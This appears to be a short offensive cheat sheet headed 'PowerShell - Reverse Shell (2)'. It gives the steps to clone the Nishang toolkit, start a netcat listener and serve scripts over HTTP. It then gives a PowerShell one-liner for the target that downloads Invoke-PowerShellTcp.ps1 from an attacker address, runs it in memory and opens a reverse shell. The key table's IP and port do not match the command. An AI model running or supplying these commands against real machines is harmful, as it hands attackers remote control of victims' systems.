Skip to content

PowerShell - Reverse Shell (2)

Source of ps1 scripts

  • sudo git clone https://github.com/samratashok/nishang /opt/nishang

On hacker machine

listener

nc -nvlp 4444

static web server (expose /opt/nishang/Shells)

python3 -m http.server

On target machine

powershell iex (New-Object Net.WebClient).DownloadString('http://11.22.33.44:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 11.22.33.44 -Port 4444
Key Description
http://10.18.9.175:8000/ server that deliver script
-IPAddress 10.18.9.175 local/hacker machine
-Port 4443 local/hacker machine